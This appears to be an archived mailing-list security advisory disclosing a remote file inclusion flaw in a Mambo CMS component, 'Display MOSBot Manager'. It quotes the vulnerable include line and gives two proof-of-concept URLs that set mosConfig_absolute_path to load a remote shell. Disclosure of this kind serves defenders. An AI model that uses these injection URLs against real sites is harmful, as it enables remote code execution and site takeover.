<<< Date Index >>>     <<< Thread Index >>>

Mambo Component - Display MOSBot Manager Remote File Inclusion Vuln



                
###########################################################################################
                #                       Aria-Security.net Advisory              
                          #
                #                       Discovered  by: O.U.T.L.A.W             
                          #                     #                       < 
www.Aria-security.net >                                         #
                #               Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp    
                          #
                #                                                               
                          #
                
###########################################################################################


#Software: Mambo Component - Display MOSBot Manager
#Attack method: Remote File Inclusion   
#Source:

#include_once( "".$mosConfig_absolute_path."/administrator/components/". 
$component_directory ."/toolbar.". 

************************************************************************************

                                                                                
          
#Proof of Concept:                                                              
          
#http://www.site.com/com_admin-copy_module/toolbar.admin-copy_module.php?mosConfig_absolute_path=shell
#http://www.site.com/com_admin-copy_module/admin.admin-copy_module.php?mosConfig_absolute_path=shell
    
#----------------------------------------------------------                     
          
#                                                                               
                                                                                
          
#                                                                               
                  
#Contact : Outlaw@xxxxxxxxxxxxxxxxx